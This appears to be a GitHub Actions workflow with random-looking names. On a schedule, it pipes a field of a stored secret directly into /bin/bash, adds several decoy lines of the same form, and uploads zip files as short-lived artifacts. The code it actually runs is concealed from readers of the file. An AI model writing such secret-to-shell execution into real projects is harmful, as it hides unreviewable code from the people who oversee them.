name: zhuangtianbixing
on:
  workflow_dispatch:

  schedule:
    - cron: '11 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuangtianbixing
        env:
          g9710: ${{ secrets.g9710 }}
        run: |
          printf '%s' "$g9710" | jq -r .w044 | /bin/bash
          echo $r4368 | jq -r .kh19 | /bin/bash
          echo $q33 | jq -r .ndwmb387 | /bin/bash
          echo $tpz43445 | jq -r .fnt421 | /bin/bash
          echo $zqip5178 | jq -r .pbx2916 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ihH56mwf
          path: "*.zip"
          retention-days: 1
